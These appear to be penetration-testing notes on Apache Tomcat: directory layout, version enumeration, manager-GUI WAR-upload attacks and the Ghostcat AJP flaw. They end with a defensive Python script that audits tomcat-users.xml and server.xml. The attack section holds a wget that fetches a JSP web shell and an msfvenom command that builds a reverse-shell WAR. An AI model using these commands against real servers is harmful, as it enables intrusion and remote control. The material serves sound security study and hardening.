Tomcat

Web Server.

Apache Tomcat is an open-source web server that hosts applications written in Java.

Default File Structure

/opt/tomcat/  (Tomcat installation directory)
├── bin/          (Startup, shutdown, and management scripts)
│   ├── catalina.sh  (Main control script for Tomcat)
│   ├── startup.sh   (Starts Tomcat)
│   ├── shutdown.sh  (Stops Tomcat)
│   ├── setenv.sh    (Optional, sets environment variables)
│   ├── digest.sh    (Generates hashed passwords)
│   ├── version.sh   (Shows Tomcat version)
│   ├── tool-wrapper.sh  (Helper script for Java tools)
│   ├── tomcat-juli.jar  (Tomcat logging utility)
│   ├── *.bat  (Windows equivalent of shell scripts)
├── conf/         (Configuration files)
│   ├── server.xml        (Main configuration file)
│   ├── web.xml           (Default web application settings)
│   ├── tomcat-users.xml  (User roles and authentication)
│   ├── tomcat-users.xsd  (XML schema definition for `tomcat-users.xml`)
│   ├── logging.properties (Logging configuration)
│   ├── catalina.policy   (Security policy for Java permissions)
│   ├── catalina.properties (JVM properties)
│   ├── context.xml       (Default context settings)
│   ├── jaspic-providers.xml (Java Authentication configuration)
│   ├── jaas.config       (Java Authentication and Authorization Service)
├── lib/          (Core Tomcat libraries)
│   ├── servlet-api.jar  (Servlet API)
│   ├── tomcat-api.jar   (Tomcat core API)
│   ├── tomcat-util.jar  (Utility classes)
│   ├── ecj-*.jar        (Eclipse Compiler for JSP)
│   ├── jsp-api.jar      (JSP API)
│   ├── websocket-api.jar (WebSocket API)
│   ├── *.jar            (Additional dependencies)
├── logs/         (Log files)
│   ├── catalina.out    (Main log file)
│   ├── localhost.log   (Logs specific to the localhost container)
│   ├── manager.log     (Logs for Tomcat Manager application)
│   ├── host-manager.log (Logs for Host Manager application)
│   ├── *.log           (Other logs)
├── temp/         (Temporary files)
│   ├── tomcat.*        (Temporary data storage for Tomcat)
├── webapps/      (Deployed applications)
│   ├── ROOT/         (Default root application)
│   │   ├── index.jsp  (Default welcome page)
│   │   ├── WEB-INF/   (Configuration files for the app)
│   ├── manager/      (Tomcat Manager Web UI)
│   │   ├── images/      (Icons and graphics for the UI)
│   │   ├── META-INF/    (Metadata and security settings)
│   │   └── WEB-INF/     (Application configurations)
│   │       ├── web.xml  (Defines servlet settings for the Manager app)
│   ├── host-manager/ (Tomcat Virtual Host Manager)
│   ├── docs/        (Tomcat documentation)
│   ├── examples/    (Example applications)
│   ├── myapp.war    (Custom deployed application - .war file)
│   ├── <CUSTOMAPP>/   (Custom web application)
│   │   ├── images/      (Custom app images)
│   │   ├── index.jsp    (Main entry point of the app)
│   │   ├── META-INF/
│   │   │   └── context.xml  (Application-specific context configuration)
│   │   ├── status.xsd   (XML Schema for status validation)
│   │   └── WEB-INF/
│   │       ├── jsp/
│   │       │   └── admin.jsp   (Admin page JSP)
│   │       ├── lib/
│   │       │   └── jdbc_drivers.jar   (Database driver)
│   │       ├── classes/
│   │       │   └── AdminServlet.class  (Compiled Servlet for Admin)
│   │       └── web.xml    (<--- Defines servlet settings for customapp)
├── work/         (Compiled JSP files and runtime data)
│   ├── Catalina/   (Compiled Java files for JSPs)
│   │   ├── localhost/
│   │   │   ├── _ (Default webapp compilation)
│   │   │   ├── myapp/ (Compiled JSPs for a deployed application)
├── LICENSE       (License information)
├── NOTICE        (Legal notices)
└── RELEASE-NOTES (Release notes)

Manual Enumeration

Version

Error Page

http://<DOMAIN>:<PORT>/invalid

/docs

curl -s http://<DOMAIN>:<PORT>/docs/ | grep Tomcat

Attacks

Many Tomcat installations provide a GUI interface to manage the application. This interface is available at /manager/html by default, and only users assigned the manager-gui role are allowed to access it. Valid manager credentials can be used to upload a packaged Tomcat application (a .war file) and compromise the application. A WAR, or Web Application Archive, packages a web application so it can be deployed quickly or kept as a backup.

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp
zip -r backup.war cmd.jsp 

Click Browse to select the .war file, then click Deploy. The file is uploaded through the manager GUI, after which the /backup application appears in the applications table. Clicking backup redirects to http://<DOMAIN>:<PORT>/backup/; append cmd.jsp to that URL to reach the web shell.

We can also generate the WAR with msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > backup.war

CVE

Ghostcat: unauthenticated LFI in all Tomcat versions before 9.0.31, 8.5.51, and 7.0.100, reached through the AJP connector (port 8009 by default). The exploit can only read files and folders within the webapps directory.
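The two configuration files behind the risks in the Attacks and CVE sections are conf/tomcat-users.xml (who holds the manager-gui or manager-script roles that allow WAR deployment, and whether those passwords are stored in plaintext) and conf/server.xml (whether the AJP connector that Ghostcat reaches is enabled, exposed on all interfaces, or running without a secret). The Python script below is an added example, not part of these notes or of Tomcat itself; it audits both files from a conf/ directory. The embedded XML samples are constructed for illustration, and the hashed-vs-plaintext check is a heuristic based on the salt$iterations$hash format that bin/digest.sh produces.

```python
"""Audit a Tomcat conf/ directory for manager-role accounts and exposed AJP.

Added example (not Tomcat's own tooling). Sample XML below is constructed.
"""
import xml.etree.ElementTree as ET
from pathlib import Path

# Roles that grant access to the Manager / Host Manager applications.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}
HEX = set("0123456789abcdef")

# Constructed sample of conf/tomcat-users.xml (real files use this namespace).
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,manager-script"/>
  <user username="deploy" password="5f1a3c9e$1$9b2d4f6e8a0c1b3d5e7f9a0b1c2d3e4f" roles="manager-script"/>
  <user username="viewer" password="x" roles="probe"/>
</tomcat-users>
"""

# Constructed sample of conf/server.xml with an AJP connector left wide open.
SAMPLE_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
    <!-- <Connector port="8010" protocol="AJP/1.3"/> commented out: ignored -->
  </Service>
</Server>
"""

# Same file with the connector bound to loopback and protected by a secret.
SAMPLE_SERVER_XML_HARDENED = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8009" protocol="AJP/1.3" address="::1"
               secretRequired="true" secret="CONSTRUCTED-EXAMPLE-SECRET"/>
  </Service>
</Server>
"""


def local_name(el):
    """Strip the XML namespace so namespaced and bare files are handled alike."""
    return el.tag.split("}")[-1]


def looks_digested(pw):
    """Heuristic: digest.sh emits salt$iterations$hash (hex fields); older
    setups store a bare hex digest. Anything else is treated as plaintext."""
    fields = pw.lower().split("$")
    if not all(f and set(f) <= HEX for f in fields):
        return False
    return len(fields) == 3 or (len(fields) == 1 and len(pw) in (32, 40, 64, 128))


def audit_tomcat_users(xml_text):
    """Return one finding per account holding a manager/admin role."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local_name(el) != "user":
            continue
        roles = {r.strip() for r in el.get("roles", "").split(",") if r.strip()}
        privileged = roles & MANAGER_ROLES
        if not privileged:
            continue
        findings.append({
            "user": el.get("username") or el.get("name", "?"),
            "roles": sorted(privileged),
            "plaintext": not looks_digested(el.get("password", "")),
        })
    return findings


def audit_ajp_connectors(xml_text):
    """Return every active AJP connector with the weaknesses found on it.
    Commented-out connectors are not parsed, so they are correctly skipped."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if local_name(el) != "Connector":
            continue
        if "ajp" not in el.get("protocol", "HTTP/1.1").lower():
            continue
        issues = []
        if not el.get("secret"):
            issues.append("no AJP secret configured")
        addr = el.get("address")
        if addr is None or addr in ("0.0.0.0", "::", "*"):
            # Before 9.0.31 the default bind address was all interfaces.
            issues.append(f"not bound to loopback (address={addr!r})")
        if el.get("secretRequired", "true").lower() == "false":
            issues.append('secretRequired="false"')
        findings.append({"port": el.get("port", "8009"), "issues": issues})
    return findings


def audit_conf_dir(conf_dir):
    """Audit a real conf/ directory (e.g. /opt/tomcat/conf)."""
    conf = Path(conf_dir)
    return {"users": audit_tomcat_users((conf / "tomcat-users.xml").read_text()),
            "ajp": audit_ajp_connectors((conf / "server.xml").read_text())}


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print("manager account:", f)
    for f in audit_ajp_connectors(SAMPLE_SERVER_XML):
        print("AJP connector:", f)
```

Run it against a real installation with `audit_conf_dir("/opt/tomcat/conf")`. Note that digested passwords in tomcat-users.xml only take effect when the Realm in server.xml is configured with a matching CredentialHandler, so a "hashed" result here is necessary but not sufficient.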
